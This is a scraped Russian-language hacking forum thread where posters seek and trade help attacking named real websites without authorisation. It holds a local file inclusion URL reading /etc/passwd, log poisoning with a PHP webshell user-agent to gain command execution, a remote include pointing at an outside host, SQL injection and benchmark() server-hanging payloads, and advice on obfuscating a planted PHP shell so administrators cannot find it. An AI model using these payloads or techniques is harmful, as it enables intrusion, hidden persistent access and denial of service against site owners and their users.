темболее это именна та которую самой первой нашел после 5 минут на сайте.... я ж написал подскажите проявите себя нужна sql-инъекция
Народ как использовать данные уязвимости - http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd Если можно то по подробней пожалуйста ! Спасибо !
там кодес типа PHP: ... include($_GET['filename']); ... посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить удалённый инклуд не катит ибо так настроен сервер http://www.planeta.ua/fc/template.php?filename=http://toxa.nov.ru/z.txt
Code: http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+GROUP+BY+1-- Вот эта инъёкция какая то странная... никак не могу врубится, почему не работают union, group by, и т.п., хотя через ; запросы выполняются
Здравствуйте! Подскажите, как можно закодировать .php файл с шеллом, чтобы сервер его исполнял, а админ не смог бы найти по названию функций и прочему тексту этот файл через поиск файлов в каталоге. желательно, чтобы по словам Code: eval(gzinflate(base64_decode(' он тоже не нашел этот файл. Linux, Apache2 софт типа Zend Optimiser не стоит. Спасибо!
собираешь код в переменную в несколько этапов, разбросанных под коду и пропускаешь через preg_replace с модификатором e
пчочему то ругается на union просто на select и тому подобное... http://shop.winm.ru/index.php?productID=262' этот магазин не работает уже 2 года а сайт остался... я на нем тренируюсь он дырявый xss я нашел много теперь нашел ошибку в sql но немогу ее использовать... Причем как то странно LIMIT работает: ( http://shop.winm.ru/index.php?productID=353+or+15+limit+3 ) а вот остально нет... и еще один вопросик phpbb можно взломать не зарегистрировавшись??? а то тоже для жксперементов нашел не администрируемый и мертвый форум последнее обновление в 2005 г и там регистрация только с подтверждения админа... можно его както взломать? могу адрес дать....
я тебя немного не понял можешь обьяснить..... я понял то что нет инъекции но на будующее что значит в 3 ветки?
в 3-ей ветке нет оператора union можешь benchmark использовать... http://localhost/test.php?id=1-benchmark(1000000,benchamrk(1000000, md5(current_time))), или http://localhost/test2.php?order=(benchmark(1000000,benchamrk(1000000, md5(current_time)))) Тупо вешает сервак (работает на 3-ке)
это как??? в первый раз слышу мне аж стыдно стало.... обьясни пожайлуста... я имею ввиду как benchmark использовать.... или ссылку дай где прочитать мона.... эсли не затруднит....
